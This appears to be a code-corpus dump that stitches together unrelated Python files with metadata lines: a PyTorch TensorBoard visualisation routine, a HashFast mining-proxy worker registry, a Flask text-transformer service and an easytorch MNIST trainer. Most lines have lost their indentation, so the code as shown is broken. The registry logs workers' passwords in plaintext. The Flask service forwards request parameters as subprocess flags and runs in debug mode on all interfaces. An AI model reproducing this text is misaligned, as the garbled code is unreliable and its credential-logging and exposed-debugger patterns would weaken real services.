embeddings = []
inputs = []
labels = []
with torch.no_grad():
for _, input_data in enumerate(dataloader):
inp_data, label = input_data
# move data to GPU if possible
if params.cuda:
inp_data = inp_data.to(params.device)
label = label.to(params.device)
# compute model output
embed, output = model(inp_data)
            # move results to the CPU; rebinding the loop variable would not
            # affect the original tensors, so reassign each name explicitly
            output, embed, inp_data, label = (
                t.cpu() for t in (output, embed, inp_data, label))
class_probs.append(output)
embeddings.append(embed)
inputs.append(inp_data)
labels.append(label)
logging.info("- done.")
class_probs = torch.exp(torch.cat(class_probs))
_, class_preds = torch.max(class_probs, 1)
embeddings = torch.cat(embeddings)
labels = torch.cat(labels)
inputs = torch.cat(inputs)
# Add PR curve to tensorboard
logging.info("Add Precision-Recall in tensorboard...")
for i in range(params.num_classes):
tensorboard_probs = class_probs[:, i]
tensorboard_preds = class_preds == i
writer.add_pr_curve(str(i),
tensorboard_preds,
tensorboard_probs)
# Add random samples to the projector on tensorboard
logging.info("Add Projections in tensorboard...")
perm = np.random.randint(0, len(embeddings), num_proj)
labels = labels[perm]
class_labels = labels.tolist()
writer.add_embedding(mat=embeddings[perm, ...],
metadata=class_labels,
label_img=inputs[perm, ...])
def main():
"""Main function
"""
# Load the parameters
args = args_parser()
json_path = os.path.join(args.model_dir, 'params.json')
assert os.path.isfile(json_path), "No json config file found at {}".format(json_path)
params = utils.Params(json_path)
# Create summary writer for use with tensorboard
writer = SummaryWriter(os.path.join(args.model_dir, 'runs', 'visualize'))
# use GPU if available
    params.cuda = torch.cuda.is_available()  # use GPU if available
# Set the random seed for reproducible experiments
torch.manual_seed(230)
if params.cuda:
torch.cuda.manual_seed(230)
params.device = "cuda:0"
else:
params.device = "cpu"
# Set the logger
utils.set_logger(os.path.join(args.model_dir, 'visualize.log'))
logging.info("Loading the dataset...")
# fetch dataloaders
dataloaders = d_l.get_dataloader(['test'], args.data_dir, params)
test_dl = dataloaders['test']
logging.info("- done.")
# Define the model
model = Net(params)
if params.cuda:
model = model.to(params.device)
logging.info("Starting evaluation")
# Reload weights from the saved file
utils.load_checkpoint(os.path.join(args.model_dir, args.restore_file + '.pth.tar'), model)
    # Visualize the results
visualize(model, test_dl, params, writer)
writer.close()
if __name__ == '__main__':
main()
| 2.546875
| 3
|
hf/mining_libs/worker_registry.py
|
HashFast/hashfast-tools
| 1
|
12778048
|
<filename>hf/mining_libs/worker_registry.py
#!/usr/bin/env python
# Copyright (c) 2014, HashFast Technologies LLC
# All rights reserved.
#
# based heavily upon:
# Stratum mining proxy (https://github.com/slush0/stratum-mining-proxy)
# Copyright (C) 2012 <NAME> <<EMAIL>>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of HashFast Technologies LLC nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL HASHFAST TECHNOLOGIES LLC BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import time
import stratum.logger
log = stratum.logger.get_logger('proxy')
class WorkerRegistry(object):
def __init__(self, f):
self.f = f # Factory of Stratum client
self.clear_authorizations()
def clear_authorizations(self):
self.authorized = []
self.unauthorized = []
self.last_failure = 0
def _on_authorized(self, result, worker_name):
if result == True:
self.authorized.append(worker_name)
else:
self.unauthorized.append(worker_name)
return result
def _on_failure(self, failure, worker_name):
log.exception("Cannot authorize worker '%s'" % worker_name)
self.last_failure = time.time()
def authorize(self, worker_name, password):
if worker_name in self.authorized:
return True
if worker_name in self.unauthorized and time.time() - self.last_failure < 60:
# Prevent flooding of mining.authorize() requests
log.warning("Authentication of worker '%s' with password '%s' failed, next attempt in few seconds..." % \
(worker_name, password))
return False
d = self.f.rpc('mining.authorize', [worker_name, password])
d.addCallback(self._on_authorized, worker_name)
d.addErrback(self._on_failure, worker_name)
return d
def is_authorized(self, worker_name):
return (worker_name in self.authorized)
def is_unauthorized(self, worker_name):
return (worker_name in self.unauthorized)
| 1.429688
| 1
|
app.py
|
CrossLangNV/text_transformer
| 0
|
12778049
|
<reponame>CrossLangNV/text_transformer
import os
import json
import subprocess
import flask
app = flask.Flask(__name__)
TMP_FILE_FOR_INPUT = 'input.txt'
TMP_FILE_FOR_OUTPUT = 'output.txt'
@app.route('/')
def home():
return 'COMPRISE Text Transformer Service'
@app.route('/transform', methods=['POST'])
def transform_text():
    # The transformation parameters arrive as a single JSON-encoded
    # query-string key, so take the first key and decode it.
    params = json.loads(flask.request.args.items().__next__()[0])
with open(TMP_FILE_FOR_INPUT, mode='w') as f:
text = flask.request.data.decode()
f.write(text)
cmd = ["python", "transform.py"]
for key, value in params.items():
cmd.extend(['-' + key, str(value)])
cmd.extend([os.path.abspath(TMP_FILE_FOR_INPUT), os.path.abspath(TMP_FILE_FOR_OUTPUT)])
subprocess.run(cmd, cwd='./transformer')
with open(TMP_FILE_FOR_OUTPUT, mode='r') as f:
result = ''.join(f.readlines())
return result
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000, debug=True)
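# A client-side sketch matching how transform_text() reads its input: the
# parameters travel as a single JSON-encoded query-string key and the text to
# transform is the raw request body. The host/port come from app.run() above;
# the parameter names inside params are assumptions for illustration.
#
# import json
# import requests
#
# params = json.dumps({"seed": 1})
# resp = requests.post(
#     "http://localhost:5000/transform",
#     params={params: ""},  # the JSON string becomes the first query key
#     data="some text to transform",
# )
# print(resp.text)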
| 2.328125
| 2
|
examples/MNIST_easytorch_CNN.py
|
sraashis/quenn
| 0
|
12778050
|
<filename>examples/MNIST_easytorch_CNN.py<gh_stars>0
import torch
import torch.nn.functional as F
from torchvision import datasets, transforms
from examples.models import MNISTNet
from easytorch import EasyTorch, ETTrainer, ConfusionMatrix, ETMeter, AUCROCMetrics
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
class MNISTTrainer(ETTrainer):
def _init_nn_model(self):
self.nn['model'] = MNISTNet()
def iteration(self, batch):
inputs = batch[0].to(self.device['gpu']).float()
labels = batch[1].to(self.device['gpu']).long()
out = self.nn['model'](inputs)
loss = F.nll_loss(out, labels)
_, pred = torch.max(out, 1)
meter = self.new_meter()
meter.averages.add(loss.item(), len(inputs))
meter.averages.add(loss.item() * 0.3, len(inputs), 1)
meter.metrics['cmf'].add(pred, labels.float())
meter.metrics['auc'].add(pred, labels.float())
return {'loss': loss, 'meter': meter, 'predictions': pred}
def init_experiment_cache(self):
self.cache['log_header'] = 'Loss|Accuracy,F1,Precision,Recall'
self.cache.update(monitor_metric='f1', metric_direction='maximize')
def new_meter(self):
return ETMeter(
num_averages=2,
cmf=ConfusionMatrix(num_classes=10),
auc=AUCROCMetrics()
)
train_dataset = datasets.MNIST('../data', train=True, download=True,
transform=transform)
val_dataset = datasets.MNIST('../data', train=False,
transform=transform)
dataloader_args = {'train': {'dataset': train_dataset},
'validation': {'dataset': val_dataset}}
runner = EasyTorch(phase='train', distributed_validation=True,
batch_size=512, epochs=2,
dataloader_args=dataloader_args)
if __name__ == "__main__":
runner.run(MNISTTrainer)
| 2.515625
| 3
|